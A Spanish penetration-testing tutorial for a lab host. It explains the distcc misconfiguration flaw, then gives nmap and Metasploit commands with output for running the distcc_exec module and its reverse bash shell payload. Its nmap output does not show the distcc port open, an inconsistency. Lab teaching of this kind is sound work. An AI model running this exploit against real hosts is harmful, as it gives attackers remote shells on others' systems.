Realizar pruebas de penetración
Principio de la vulnerabilidad del servicio Distcc:
Distcc se utiliza para la compilación distribuida de grandes bases de código en servidores de red. Sin embargo, si está mal configurado, se puede abusar de él para ejecutar comandos. Esta vulnerabilidad está presente en XCode 1.5 y otras versiones de Distcc 2.x debido a la falta de restricciones de acceso en el puerto del servidor.
En términos simples, el servicio carece de verificaciones adecuadas en los puertos y las tareas ejecutadas, lo que permite a los atacantes aprovechar las tareas de compilación distribuida para ejecutar sus propios comandos.
Índices de vulnerabilidad:
Código del módulo de ataque de la vulnerabilidad:
Primero, inicie msfconsole para acceder a la interfaz de operación:
cd ~
msfconsole
Utilice la herramienta de escaneo Nmap para escanear los puertos abiertos del host objetivo:
nmap -sV -T4 192.168.122.102
A continuación, un ejemplo de la salida que podría ver:
[*] exec: nmap -sV -T4 192.168.122.102
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-30 21:51 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0075s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
53/tcp open domain ISC BIND 9.4.2
111/tcp open rpcbind 2 (RPC #100000)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 7.41 seconds
Basado en los resultados del escaneo, busque el módulo correspondiente al servicio de puerto que desea atacar:
search distcc
En la terminal de Kali MSF, utilice el comando use
para seleccionar el módulo adecuado:
use exploit/unix/misc/distcc_exec
Luego, utilice el comando show options
para mostrar los parámetros del módulo:
show options
A continuación, un ejemplo de la salida que podría ver:
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasplo
it.html
RPORT 3632 yes The target port (TCP)
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.28.140.88 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
Establezca el parámetro del host objetivo RHOST en 192.168.122.102
set RHOST 192.168.122.102
Una vez que todo esté configurado, utilice el comando exploit
para atacar el host:
exploit
Presione Ctrl+D para salir de la consola de Metasploit y luego inicie la inspección